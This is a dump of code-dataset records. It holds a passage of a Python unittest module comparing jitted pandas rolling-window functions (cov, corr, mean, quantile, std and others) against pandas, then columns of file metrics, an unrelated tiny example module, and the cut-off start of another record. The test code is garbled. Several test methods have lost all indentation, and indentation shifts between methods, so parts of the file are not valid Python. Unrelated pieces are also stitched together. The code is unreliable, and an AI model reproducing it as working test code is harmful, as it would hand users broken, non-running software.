        # all functions except apply
        S1 = pd.Series([0, 1, 2, np.nan, 4])
        S2 = pd.Series([0, 1, 2, -2, 4])
        wins = (3,)
        if LONG_TEST:
            wins = (2, 3, 5)
        centers = (False, True)
        for func_name in test_funcs:
            func_text = "def test_impl(S, w, c):\n return S.rolling(w, center=c).{}()\n".format(func_name)
            loc_vars = {}
            exec(func_text, {}, loc_vars)
            test_impl = loc_vars['test_impl']
            hpat_func = self.jit(test_impl)
            for args in itertools.product(wins, centers):
                pd.testing.assert_series_equal(hpat_func(S1, *args), test_impl(S1, *args))
                pd.testing.assert_series_equal(hpat_func(S2, *args), test_impl(S2, *args))
        # test apply
        def apply_test_impl(S, w, c):
            return S.rolling(w, center=c).apply(lambda a: a.sum())
        hpat_func = self.jit(apply_test_impl)
        for args in itertools.product(wins, centers):
            pd.testing.assert_series_equal(hpat_func(S1, *args), apply_test_impl(S1, *args))
            pd.testing.assert_series_equal(hpat_func(S2, *args), apply_test_impl(S2, *args))
@skip_numba_jit
def test_series_cov1(self):
# test series rolling functions
# all functions except apply
S1 = pd.Series([0, 1, 2, np.nan, 4])
S2 = pd.Series([0, 1, 2, -2, 4])
wins = (3,)
if LONG_TEST:
wins = (2, 3, 5)
centers = (False, True)
def test_impl(S, S2, w, c):
return S.rolling(w, center=c).cov(S2)
hpat_func = self.jit(test_impl)
for args in itertools.product([S1, S2], [S1, S2], wins, centers):
pd.testing.assert_series_equal(hpat_func(*args), test_impl(*args))
pd.testing.assert_series_equal(hpat_func(*args), test_impl(*args))
def test_impl2(S, S2, w, c):
return S.rolling(w, center=c).corr(S2)
hpat_func = self.jit(test_impl2)
for args in itertools.product([S1, S2], [S1, S2], wins, centers):
pd.testing.assert_series_equal(hpat_func(*args), test_impl2(*args))
pd.testing.assert_series_equal(hpat_func(*args), test_impl2(*args))
@skip_numba_jit
def test_df_cov1(self):
# test series rolling functions
# all functions except apply
df1 = pd.DataFrame({'A': [0, 1, 2, np.nan, 4], 'B': np.ones(5)})
df2 = pd.DataFrame({'A': [0, 1, 2, -2, 4], 'C': np.ones(5)})
wins = (3,)
if LONG_TEST:
wins = (2, 3, 5)
centers = (False, True)
def test_impl(df, df2, w, c):
return df.rolling(w, center=c).cov(df2)
hpat_func = self.jit(test_impl)
for args in itertools.product([df1, df2], [df1, df2], wins, centers):
pd.testing.assert_frame_equal(hpat_func(*args), test_impl(*args))
pd.testing.assert_frame_equal(hpat_func(*args), test_impl(*args))
def test_impl2(df, df2, w, c):
return df.rolling(w, center=c).corr(df2)
hpat_func = self.jit(test_impl2)
for args in itertools.product([df1, df2], [df1, df2], wins, centers):
pd.testing.assert_frame_equal(hpat_func(*args), test_impl2(*args))
pd.testing.assert_frame_equal(hpat_func(*args), test_impl2(*args))
@skip_sdc_jit('Series.rolling.min() unsupported exceptions')
def test_series_rolling_unsupported_values(self):
def test_impl(series, window, min_periods, center,
win_type, on, axis, closed):
return series.rolling(window, min_periods, center,
win_type, on, axis, closed).min()
hpat_func = self.jit(test_impl)
series = pd.Series(test_global_input_data_float64[0])
with self.assertRaises(ValueError) as raises:
hpat_func(series, -1, None, False, None, None, 0, None)
self.assertIn('window must be non-negative', str(raises.exception))
with self.assertRaises(ValueError) as raises:
hpat_func(series, 1, -1, False, None, None, 0, None)
self.assertIn('min_periods must be >= 0', str(raises.exception))
with self.assertRaises(ValueError) as raises:
hpat_func(series, 1, 2, False, None, None, 0, None)
self.assertIn('min_periods must be <= window', str(raises.exception))
with self.assertRaises(ValueError) as raises:
hpat_func(series, 1, 2, False, None, None, 0, None)
self.assertIn('min_periods must be <= window', str(raises.exception))
msg_tmpl = 'Method rolling(). The object {}\n expected: {}'
with self.assertRaises(ValueError) as raises:
hpat_func(series, 1, None, True, None, None, 0, None)
msg = msg_tmpl.format('center', 'False')
self.assertIn(msg, str(raises.exception))
with self.assertRaises(ValueError) as raises:
hpat_func(series, 1, None, False, 'None', None, 0, None)
msg = msg_tmpl.format('win_type', 'None')
self.assertIn(msg, str(raises.exception))
with self.assertRaises(ValueError) as raises:
hpat_func(series, 1, None, False, None, 'None', 0, None)
msg = msg_tmpl.format('on', 'None')
self.assertIn(msg, str(raises.exception))
with self.assertRaises(ValueError) as raises:
hpat_func(series, 1, None, False, None, None, 1, None)
msg = msg_tmpl.format('axis', '0')
self.assertIn(msg, str(raises.exception))
with self.assertRaises(ValueError) as raises:
hpat_func(series, 1, None, False, None, None, 0, 'None')
msg = msg_tmpl.format('closed', 'None')
self.assertIn(msg, str(raises.exception))
    @skip_sdc_jit('Series.rolling.min() unsupported exceptions')
    def test_series_rolling_unsupported_types(self):
        """Verify the TypingError messages raised when Series.rolling(...)
        arguments have unsupported types."""
        def test_impl(series, window, min_periods, center,
                      win_type, on, axis, closed):
            return series.rolling(window, min_periods, center,
                                  win_type, on, axis, closed).min()
        hpat_func = self.jit(test_impl)

        series = pd.Series(test_global_input_data_float64[0])
        msg_tmpl = 'Method rolling(). The object {}\n given: {}\n expected: {}'
        with self.assertRaises(TypingError) as raises:
            hpat_func(series, '1', None, False, None, None, 0, None)
        msg = msg_tmpl.format('window', 'unicode_type', 'int')
        self.assertIn(msg, str(raises.exception))
        with self.assertRaises(TypingError) as raises:
            hpat_func(series, 1, '1', False, None, None, 0, None)
        msg = msg_tmpl.format('min_periods', 'unicode_type', 'None, int')
        self.assertIn(msg, str(raises.exception))
        with self.assertRaises(TypingError) as raises:
            hpat_func(series, 1, None, 0, None, None, 0, None)
        msg = msg_tmpl.format('center', 'int64', 'bool')
        self.assertIn(msg, str(raises.exception))
        with self.assertRaises(TypingError) as raises:
            hpat_func(series, 1, None, False, -1, None, 0, None)
        msg = msg_tmpl.format('win_type', 'int64', 'str')
        self.assertIn(msg, str(raises.exception))
        with self.assertRaises(TypingError) as raises:
            hpat_func(series, 1, None, False, None, -1, 0, None)
        msg = msg_tmpl.format('on', 'int64', 'str')
        self.assertIn(msg, str(raises.exception))
        with self.assertRaises(TypingError) as raises:
            hpat_func(series, 1, None, False, None, None, None, None)
        msg = msg_tmpl.format('axis', 'none', 'int, str')
        self.assertIn(msg, str(raises.exception))
        with self.assertRaises(TypingError) as raises:
            hpat_func(series, 1, None, False, None, None, 0, -1)
        msg = msg_tmpl.format('closed', 'int64', 'str')
        self.assertIn(msg, str(raises.exception))
    @skip_sdc_jit('Series.rolling.apply() unsupported Series index')
    def test_series_rolling_apply_mean(self):
        """Compare jitted rolling.apply(mean) with pandas over several data
        sets, reversed indices, windows and min_periods values."""
        def test_impl(series, window, min_periods):
            def func(x):
                # empty windows must yield NaN, matching pandas behavior
                if len(x) == 0:
                    return np.nan
                return x.mean()
            return series.rolling(window, min_periods).apply(func)
        hpat_func = self.jit(test_impl)

        all_data = [
            list(range(10)), [1., -1., 0., 0.1, -0.1],
            [1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
            [np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
        ]
        indices = [list(range(len(data)))[::-1] for data in all_data]
        for data, index in zip(all_data, indices):
            series = pd.Series(data, index, name='A')
            for window in range(0, len(series) + 3, 2):
                for min_periods in range(0, window + 1, 2):
                    with self.subTest(series=series, window=window,
                                      min_periods=min_periods):
                        jit_result = hpat_func(series, window, min_periods)
                        ref_result = test_impl(series, window, min_periods)
                        pd.testing.assert_series_equal(jit_result, ref_result)
    @skip_sdc_jit('Series.rolling.apply() unsupported exceptions')
    def test_series_rolling_apply_unsupported_types(self):
        """Verify the TypingError raised when rolling.apply() receives a
        non-bool 'raw' argument."""
        def test_impl(raw):
            def func(x):
                if len(x) == 0:
                    return np.nan
                return np.median(x)
            series = pd.Series([1., -1., 0., 0.1, -0.1])
            return series.rolling(3).apply(func, raw=raw)
        hpat_func = self.jit(test_impl)

        with self.assertRaises(TypingError) as raises:
            hpat_func(1)
        msg = 'Method rolling.apply(). The object raw\n given: int64\n expected: bool'
        self.assertIn(msg, str(raises.exception))
    @unittest.skip('Series.rolling.apply() unsupported args')
    def test_series_rolling_apply_args(self):
        """Compare jitted rolling.apply(quantile, args=(q,)) with pandas;
        currently skipped because extra apply() args are unsupported."""
        def test_impl(series, window, min_periods, q):
            def func(x, q):
                # empty windows must yield NaN, matching pandas behavior
                if len(x) == 0:
                    return np.nan
                return np.quantile(x, q)
            return series.rolling(window, min_periods).apply(func, raw=None, args=(q,))
        hpat_func = self.jit(test_impl)

        all_data = [
            list(range(10)), [1., -1., 0., 0.1, -0.1],
            [1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
            [np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
        ]
        indices = [list(range(len(data)))[::-1] for data in all_data]
        for data, index in zip(all_data, indices):
            series = pd.Series(data, index, name='A')
            for window in range(0, len(series) + 3, 2):
                for min_periods in range(0, window + 1, 2):
                    for q in [0.25, 0.5, 0.75]:
                        with self.subTest(series=series, window=window,
                                          min_periods=min_periods, q=q):
                            jit_result = hpat_func(series, window, min_periods, q)
                            ref_result = test_impl(series, window, min_periods, q)
                            pd.testing.assert_series_equal(jit_result, ref_result)
    @skip_sdc_jit('Series.rolling.corr() unsupported Series index')
    def test_series_rolling_corr(self):
        """Compare jitted rolling.corr(other) with pandas over all pairs of
        test data sets, windows and min_periods values."""
        def test_impl(series, window, min_periods, other):
            return series.rolling(window, min_periods).corr(other)
        hpat_func = self.jit(test_impl)

        all_data = [
            list(range(10)), [1., -1., 0., 0.1, -0.1],
            [1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
            [np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
        ]
        for main_data, other_data in product(all_data, all_data):
            series = pd.Series(main_data)
            other = pd.Series(other_data)
            for window in range(0, len(series) + 3, 2):
                for min_periods in range(0, window, 2):
                    with self.subTest(series=series, other=other,
                                      window=window, min_periods=min_periods):
                        ref_result = test_impl(series, window, min_periods, other)
                        jit_result = hpat_func(series, window, min_periods, other)
                        pd.testing.assert_series_equal(ref_result, jit_result)
    @skip_sdc_jit('Series.rolling.corr() unsupported Series index')
    def test_series_rolling_corr_with_no_other(self):
        """Compare jitted rolling.corr() (self-correlation, no 'other'
        argument) with pandas over the test data sets."""
        def test_impl(series, window, min_periods):
            return series.rolling(window, min_periods).corr()
        hpat_func = self.jit(test_impl)

        all_data = [
            list(range(10)), [1., -1., 0., 0.1, -0.1],
            [1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
            [np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
        ]
        for data in all_data:
            series = pd.Series(data)
            for window in range(0, len(series) + 3, 2):
                for min_periods in range(0, window, 2):
                    with self.subTest(series=series, window=window,
                                      min_periods=min_periods):
                        jit_result = hpat_func(series, window, min_periods)
                        ref_result = test_impl(series, window, min_periods)
                        pd.testing.assert_series_equal(jit_result, ref_result)
    @skip_sdc_jit('Series.rolling.corr() unsupported exceptions')
    def test_series_rolling_corr_unsupported_types(self):
        """Verify the TypingError raised when rolling.corr() receives a
        non-bool 'pairwise' argument."""
        def test_impl(pairwise):
            series = pd.Series([1., -1., 0., 0.1, -0.1])
            return series.rolling(3, 3).corr(pairwise=pairwise)
        hpat_func = self.jit(test_impl)

        with self.assertRaises(TypingError) as raises:
            hpat_func(1)
        msg = 'Method rolling.corr(). The object pairwise\n given: int64\n expected: bool'
        self.assertIn(msg, str(raises.exception))
    @skip_sdc_jit('Series.rolling.count() unsupported Series index')
    def test_series_rolling_count(self):
        """Compare jitted rolling.count() with pandas over the global float64
        test data with reversed indices."""
        def test_impl(series, window, min_periods):
            return series.rolling(window, min_periods).count()
        hpat_func = self.jit(test_impl)

        all_data = test_global_input_data_float64
        indices = [list(range(len(data)))[::-1] for data in all_data]
        for data, index in zip(all_data, indices):
            series = pd.Series(data, index, name='A')
            for window in range(0, len(series) + 3, 2):
                for min_periods in range(0, window + 1, 2):
                    with self.subTest(series=series, window=window,
                                      min_periods=min_periods):
                        jit_result = hpat_func(series, window, min_periods)
                        ref_result = test_impl(series, window, min_periods)
                        pd.testing.assert_series_equal(jit_result, ref_result)
    @skip_sdc_jit('Series.rolling.cov() unsupported Series index')
    def test_series_rolling_cov(self):
        """Compare jitted rolling.cov(other, ddof=...) with pandas over all
        pairs of test data sets, windows, min_periods and ddof values."""
        def test_impl(series, window, min_periods, other, ddof):
            return series.rolling(window, min_periods).cov(other, ddof=ddof)
        hpat_func = self.jit(test_impl)

        all_data = [
            list(range(5)), [1., -1., 0., 0.1, -0.1],
            [1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
            [np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
        ]
        for main_data, other_data in product(all_data, all_data):
            series = pd.Series(main_data)
            other = pd.Series(other_data)
            for window in range(0, len(series) + 3, 2):
                for min_periods, ddof in product(range(0, window, 2), [0, 1]):
                    with self.subTest(series=series, other=other, window=window,
                                      min_periods=min_periods, ddof=ddof):
                        jit_result = hpat_func(series, window, min_periods, other, ddof)
                        ref_result = test_impl(series, window, min_periods, other, ddof)
                        pd.testing.assert_series_equal(jit_result, ref_result)
    @skip_sdc_jit('Series.rolling.cov() unsupported Series index')
    def test_series_rolling_cov_default(self):
        """Compare jitted rolling.cov() (self-covariance, default arguments)
        with pandas over the test data sets."""
        def test_impl(series, window, min_periods):
            return series.rolling(window, min_periods).cov()
        hpat_func = self.jit(test_impl)

        all_data = [
            list(range(5)), [1., -1., 0., 0.1, -0.1],
            [1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
            [np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
        ]
        for data in all_data:
            series = pd.Series(data)
            for window in range(0, len(series) + 3, 2):
                for min_periods in range(0, window, 2):
                    with self.subTest(series=series, window=window,
                                      min_periods=min_periods):
                        jit_result = hpat_func(series, window, min_periods)
                        ref_result = test_impl(series, window, min_periods)
                        pd.testing.assert_series_equal(jit_result, ref_result)
    @skip_sdc_jit('Series.rolling.cov() unsupported Series index')
    @unittest.expectedFailure
    def test_series_rolling_cov_issue_floating_point_rounding(self):
        """Cover issue of different float rounding in Python and SDC/Numba"""
        def test_impl(series, window, min_periods, other, ddof):
            return series.rolling(window, min_periods).cov(other, ddof=ddof)
        hpat_func = self.jit(test_impl)

        # fixed inputs known to expose the rounding difference
        series = pd.Series(list(range(10)))
        other = pd.Series([1., -1., 0., 0.1, -0.1])
        jit_result = hpat_func(series, 6, 0, other, 1)
        ref_result = test_impl(series, 6, 0, other, 1)
        pd.testing.assert_series_equal(jit_result, ref_result)
    @skip_sdc_jit('Series.rolling.cov() unsupported exceptions')
    def test_series_rolling_cov_unsupported_types(self):
        """Verify the TypingError messages raised when rolling.cov() receives
        badly-typed 'pairwise' or 'ddof' arguments."""
        def test_impl(pairwise, ddof):
            series = pd.Series([1., -1., 0., 0.1, -0.1])
            return series.rolling(3, 3).cov(pairwise=pairwise, ddof=ddof)
        hpat_func = self.jit(test_impl)

        msg_tmpl = 'Method rolling.cov(). The object {}\n given: {}\n expected: {}'
        with self.assertRaises(TypingError) as raises:
            hpat_func(1, 1)
        msg = msg_tmpl.format('pairwise', 'int64', 'bool')
        self.assertIn(msg, str(raises.exception))
        with self.assertRaises(TypingError) as raises:
            hpat_func(None, '1')
        msg = msg_tmpl.format('ddof', 'unicode_type', 'int')
        self.assertIn(msg, str(raises.exception))
    @skip_sdc_jit('Series.rolling.kurt() unsupported Series index')
    def test_series_rolling_kurt(self):
        """Compare jitted rolling.kurt() with pandas; windows start at 4
        because kurtosis needs at least four observations."""
        def test_impl(series, window, min_periods):
            return series.rolling(window, min_periods).kurt()
        hpat_func = self.jit(test_impl)

        all_data = test_global_input_data_float64
        indices = [list(range(len(data)))[::-1] for data in all_data]
        for data, index in zip(all_data, indices):
            series = pd.Series(data, index, name='A')
            for window in range(4, len(series) + 1):
                for min_periods in range(window + 1):
                    with self.subTest(series=series, window=window,
                                      min_periods=min_periods):
                        ref_result = test_impl(series, window, min_periods)
                        jit_result = hpat_func(series, window, min_periods)
                        pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.max() unsupported Series index')
def test_series_rolling_max(self):
    """Compare jitted Series.rolling.max() against the pandas reference."""
    def test_impl(series, window, min_periods):
        return series.rolling(window, min_periods).max()
    hpat_func = self.jit(test_impl)

    for data in test_global_input_data_float64:
        descending_index = list(range(len(data)))[::-1]
        series = pd.Series(data, descending_index, name='A')
        # TODO: fix the issue when window = 0
        for window in range(1, len(series) + 2):
            for min_periods in range(window + 1):
                with self.subTest(series=series, window=window,
                                  min_periods=min_periods):
                    jit_result = hpat_func(series, window, min_periods)
                    ref_result = test_impl(series, window, min_periods)
                    pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.mean() unsupported Series index')
def test_series_rolling_mean(self):
    """Compare jitted Series.rolling.mean() against the pandas reference.

    Fix: ``np.NINF`` and ``np.NZERO`` were removed in NumPy 2.0; the
    value-identical literals ``-np.inf`` and ``-0.0`` are used instead.
    """
    def test_impl(series, window, min_periods):
        return series.rolling(window, min_periods).mean()
    hpat_func = self.jit(test_impl)

    all_data = [
        list(range(10)), [1., -1., 0., 0.1, -0.1],
        [1., np.inf, np.inf, -1., 0., np.inf, -np.inf, -np.inf],
        [np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, -np.inf, -0.0]
    ]
    indices = [list(range(len(data)))[::-1] for data in all_data]
    for data, index in zip(all_data, indices):
        series = pd.Series(data, index, name='A')
        for window in range(0, len(series) + 3, 2):
            for min_periods in range(0, window + 1, 2):
                with self.subTest(series=series, window=window,
                                  min_periods=min_periods):
                    jit_result = hpat_func(series, window, min_periods)
                    ref_result = test_impl(series, window, min_periods)
                    pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.median() unsupported Series index')
def test_series_rolling_median(self):
    """Compare jitted Series.rolling.median() against the pandas reference."""
    def test_impl(series, window, min_periods):
        return series.rolling(window, min_periods).median()
    hpat_func = self.jit(test_impl)

    for data in test_global_input_data_float64:
        descending_index = list(range(len(data)))[::-1]
        series = pd.Series(data, descending_index, name='A')
        for window in range(0, len(series) + 3, 2):
            for min_periods in range(0, window + 1, 2):
                with self.subTest(series=series, window=window,
                                  min_periods=min_periods):
                    jit_result = hpat_func(series, window, min_periods)
                    ref_result = test_impl(series, window, min_periods)
                    pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.min() unsupported Series index')
def test_series_rolling_min(self):
    """Compare jitted Series.rolling.min() against the pandas reference."""
    def test_impl(series, window, min_periods):
        return series.rolling(window, min_periods).min()
    hpat_func = self.jit(test_impl)

    for data in test_global_input_data_float64:
        descending_index = list(range(len(data)))[::-1]
        series = pd.Series(data, descending_index, name='A')
        # TODO: fix the issue when window = 0
        for window in range(1, len(series) + 2):
            for min_periods in range(window + 1):
                with self.subTest(series=series, window=window,
                                  min_periods=min_periods):
                    jit_result = hpat_func(series, window, min_periods)
                    ref_result = test_impl(series, window, min_periods)
                    pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.quantile() unsupported Series index')
def test_series_rolling_quantile(self):
    """Compare jitted Series.rolling.quantile() against the pandas reference.

    Fix: ``np.NINF`` and ``np.NZERO`` were removed in NumPy 2.0; the
    value-identical literals ``-np.inf`` and ``-0.0`` are used instead.
    """
    def test_impl(series, window, min_periods, quantile):
        return series.rolling(window, min_periods).quantile(quantile)
    hpat_func = self.jit(test_impl)

    all_data = [
        list(range(10)), [1., -1., 0., 0.1, -0.1],
        [1., np.inf, np.inf, -1., 0., np.inf, -np.inf, -np.inf],
        [np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, -np.inf, -0.0]
    ]
    indices = [list(range(len(data)))[::-1] for data in all_data]
    quantiles = [0, 0.25, 0.5, 0.75, 1]
    for data, index in zip(all_data, indices):
        series = pd.Series(data, index, name='A')
        for window in range(0, len(series) + 3, 2):
            for min_periods, q in product(range(0, window, 2), quantiles):
                with self.subTest(series=series, window=window,
                                  min_periods=min_periods, quantiles=q):
                    jit_result = hpat_func(series, window, min_periods, q)
                    ref_result = test_impl(series, window, min_periods, q)
                    pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.quantile() unsupported exceptions')
def test_series_rolling_quantile_exception_unsupported_types(self):
    """Check rolling.quantile() raises TypingError for wrongly typed args."""
    def test_impl(quantile, interpolation):
        series = pd.Series([1., -1., 0., 0.1, -0.1])
        return series.rolling(3, 2).quantile(quantile, interpolation)
    hpat_func = self.jit(test_impl)

    msg_tmpl = 'Method rolling.quantile(). The object {}\n given: {}\n expected: {}'
    # (call arguments, expected message parts) per unsupported case
    unsupported_cases = [
        (('0.5', 'linear'), ('quantile', 'unicode_type', 'float')),
        ((0.5, None), ('interpolation', 'none', 'str')),
    ]
    for call_args, msg_parts in unsupported_cases:
        with self.assertRaises(TypingError) as raises:
            hpat_func(*call_args)
        self.assertIn(msg_tmpl.format(*msg_parts), str(raises.exception))
@skip_sdc_jit('Series.rolling.quantile() unsupported exceptions')
def test_series_rolling_quantile_exception_unsupported_values(self):
    """Check rolling.quantile() raises ValueError for unsupported values."""
    def test_impl(quantile, interpolation):
        series = pd.Series([1., -1., 0., 0.1, -0.1])
        return series.rolling(3, 2).quantile(quantile, interpolation)
    hpat_func = self.jit(test_impl)

    # (call arguments, expected error substring) per unsupported case
    unsupported_cases = [
        ((2, 'linear'), 'quantile value not in [0, 1]'),
        ((0.5, 'lower'), 'interpolation value not "linear"'),
    ]
    for call_args, expected_msg in unsupported_cases:
        with self.assertRaises(ValueError) as raises:
            hpat_func(*call_args)
        self.assertIn(expected_msg, str(raises.exception))
@skip_sdc_jit('Series.rolling.skew() unsupported Series index')
def test_series_rolling_skew(self):
    """Compare jitted Series.rolling.skew() against the pandas reference."""
    def test_impl(series, window, min_periods):
        return series.rolling(window, min_periods).skew()
    hpat_func = self.jit(test_impl)

    for data in test_global_input_data_float64:
        descending_index = list(range(len(data)))[::-1]
        series = pd.Series(data, descending_index, name='A')
        # window sweep starts at 3 — smaller windows are not exercised here
        for window in range(3, len(series) + 1):
            for min_periods in range(window + 1):
                with self.subTest(series=series, window=window,
                                  min_periods=min_periods):
                    ref_result = test_impl(series, window, min_periods)
                    jit_result = hpat_func(series, window, min_periods)
                    pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.std() unsupported Series index')
def test_series_rolling_std(self):
    """Compare jitted Series.rolling.std() against the pandas reference.

    Fix: ``np.NINF`` and ``np.NZERO`` were removed in NumPy 2.0; the
    value-identical literals ``-np.inf`` and ``-0.0`` are used instead.
    """
    test_impl = series_rolling_std_usecase
    hpat_func = self.jit(test_impl)

    all_data = [
        list(range(10)), [1., -1., 0., 0.1, -0.1],
        [1., np.inf, np.inf, -1., 0., np.inf, -np.inf, -np.inf],
        [np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, -np.inf, -0.0]
    ]
    indices = [list(range(len(data)))[::-1] for data in all_data]
    for data, index in zip(all_data, indices):
        series = pd.Series(data, index, name='A')
        for window in range(0, len(series) + 3, 2):
            for min_periods, ddof in product(range(0, window, 2), [0, 1]):
                with self.subTest(series=series, window=window,
                                  min_periods=min_periods, ddof=ddof):
                    jit_result = hpat_func(series, window, min_periods, ddof)
                    ref_result = test_impl(series, window, min_periods, ddof)
                    pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.std() unsupported exceptions')
def test_series_rolling_std_exception_unsupported_ddof(self):
    """Check rolling.std() raises TypingError for a non-integer ddof."""
    hpat_func = self.jit(series_rolling_std_usecase)

    series = pd.Series([1., -1., 0., 0.1, -0.1])
    with self.assertRaises(TypingError) as raises:
        hpat_func(series, 3, 2, '1')
    expected = 'Method rolling.std(). The object ddof\n given: unicode_type\n expected: int'
    self.assertIn(expected, str(raises.exception))
@skip_sdc_jit('Series.rolling.sum() unsupported Series index')
def test_series_rolling_sum(self):
    """Compare jitted Series.rolling.sum() against the pandas reference.

    Fix: ``np.NINF`` and ``np.NZERO`` were removed in NumPy 2.0; the
    value-identical literals ``-np.inf`` and ``-0.0`` are used instead.
    """
    def test_impl(series, window, min_periods):
        return series.rolling(window, min_periods).sum()
    hpat_func = self.jit(test_impl)

    all_data = [
        list(range(10)), [1., -1., 0., 0.1, -0.1],
        [1., np.inf, np.inf, -1., 0., np.inf, -np.inf, -np.inf],
        [np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, -np.inf, -0.0]
    ]
    indices = [list(range(len(data)))[::-1] for data in all_data]
    for data, index in zip(all_data, indices):
        series = pd.Series(data, index, name='A')
        for window in range(0, len(series) + 3, 2):
            for min_periods in range(0, window + 1, 2):
                with self.subTest(series=series, window=window,
                                  min_periods=min_periods):
                    jit_result = hpat_func(series, window, min_periods)
                    ref_result = test_impl(series, window, min_periods)
                    pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.var() unsupported Series index')
def test_series_rolling_var(self):
    """Compare jitted Series.rolling.var() against the pandas reference.

    Fix: ``np.NINF`` and ``np.NZERO`` were removed in NumPy 2.0; the
    value-identical literals ``-np.inf`` and ``-0.0`` are used instead.
    """
    test_impl = series_rolling_var_usecase
    hpat_func = self.jit(test_impl)

    all_data = [
        list(range(10)), [1., -1., 0., 0.1, -0.1],
        [1., np.inf, np.inf, -1., 0., np.inf, -np.inf, -np.inf],
        [np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, -np.inf, -0.0]
    ]
    indices = [list(range(len(data)))[::-1] for data in all_data]
    for data, index in zip(all_data, indices):
        series = pd.Series(data, index, name='A')
        for window in range(0, len(series) + 3, 2):
            for min_periods, ddof in product(range(0, window, 2), [0, 1]):
                with self.subTest(series=series, window=window,
                                  min_periods=min_periods, ddof=ddof):
                    jit_result = hpat_func(series, window, min_periods, ddof)
                    ref_result = test_impl(series, window, min_periods, ddof)
                    pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.var() unsupported exceptions')
def test_series_rolling_var_exception_unsupported_ddof(self):
    """Check rolling.var() raises TypingError for a non-integer ddof."""
    hpat_func = self.jit(series_rolling_var_usecase)

    series = pd.Series([1., -1., 0., 0.1, -0.1])
    with self.assertRaises(TypingError) as raises:
        hpat_func(series, 3, 2, '1')
    expected = 'Method rolling.var(). The object ddof\n given: unicode_type\n expected: int'
    self.assertIn(expected, str(raises.exception))
# Run the full test suite when this module is executed as a script.
if __name__ == "__main__":
    unittest.main()
| 46.647059
| 119
| 0.574326
| 6,175
| 46,787
| 4.178138
| 0.055709
| 0.045271
| 0.056434
| 0.046047
| 0.900465
| 0.885039
| 0.865736
| 0.834341
| 0.82062
| 0.803798
| 0
| 0.033168
| 0.296963
| 46,787
| 1,002
| 120
| 46.693613
| 0.751193
| 0.055956
| 0
| 0.734317
| 0
| 0.00615
| 0.086942
| 0.010905
| 0
| 0
| 0
| 0.000998
| 0.130381
| 1
| 0.097171
| false
| 0
| 0.01599
| 0.03075
| 0.163592
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a73c52fe01bb883dc02ee8d3e17255d9110fcc6f
| 252
|
py
|
Python
|
example/sub.py
|
mtulio/commons
|
2cb8e33e1b8e303607d7bb47fce12d5b6bc92d26
|
[
"Apache-2.0"
] | null | null | null |
example/sub.py
|
mtulio/commons
|
2cb8e33e1b8e303607d7bb47fce12d5b6bc92d26
|
[
"Apache-2.0"
] | 8
|
2017-01-21T23:34:13.000Z
|
2017-01-24T03:15:12.000Z
|
example/sub.py
|
mtulio/commons
|
2cb8e33e1b8e303607d7bb47fce12d5b6bc92d26
|
[
"Apache-2.0"
] | null | null | null |
class SubClass():
    """Packaging example class from mtulio.example.sub holding a fixed message."""

    def __init__(self):
        # Identifies this module/class in the packaging example output.
        self.message = 'init - SubFile - mtulio.example.sub Class'

    def returnMessage(self):
        """Return the message stored at construction time."""
        return self.message
def subMessageHelloWorld():
    """Return the fixed greeting string for the mtulio.example.sub module."""
    return 'init - SubFile - mtulio.example.sub Method'
| 25.2
| 66
| 0.674603
| 28
| 252
| 5.928571
| 0.5
| 0.13253
| 0.204819
| 0.289157
| 0.325301
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.218254
| 252
| 9
| 67
| 28
| 0.84264
| 0
| 0
| 0
| 0
| 0
| 0.330677
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0
| 0.285714
| 0.857143
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
a74cc3f751a93561a30dac8c04fdacc7ea88fd67
| 13,897
|
py
|
Python
|
Controls/env/Lib/site-packages/PySide/examples/desktop/systray/systray_rc.py
|
LoicBoileau/Projet-S4---Robot-Delta
|
0de0768e2609c18fbf060eb6726150a99080db1c
|
[
"MIT"
] | 32
|
2015-11-06T02:59:41.000Z
|
2021-02-12T02:44:42.000Z
|
Controls/env/Lib/site-packages/PySide/examples/desktop/systray/systray_rc.py
|
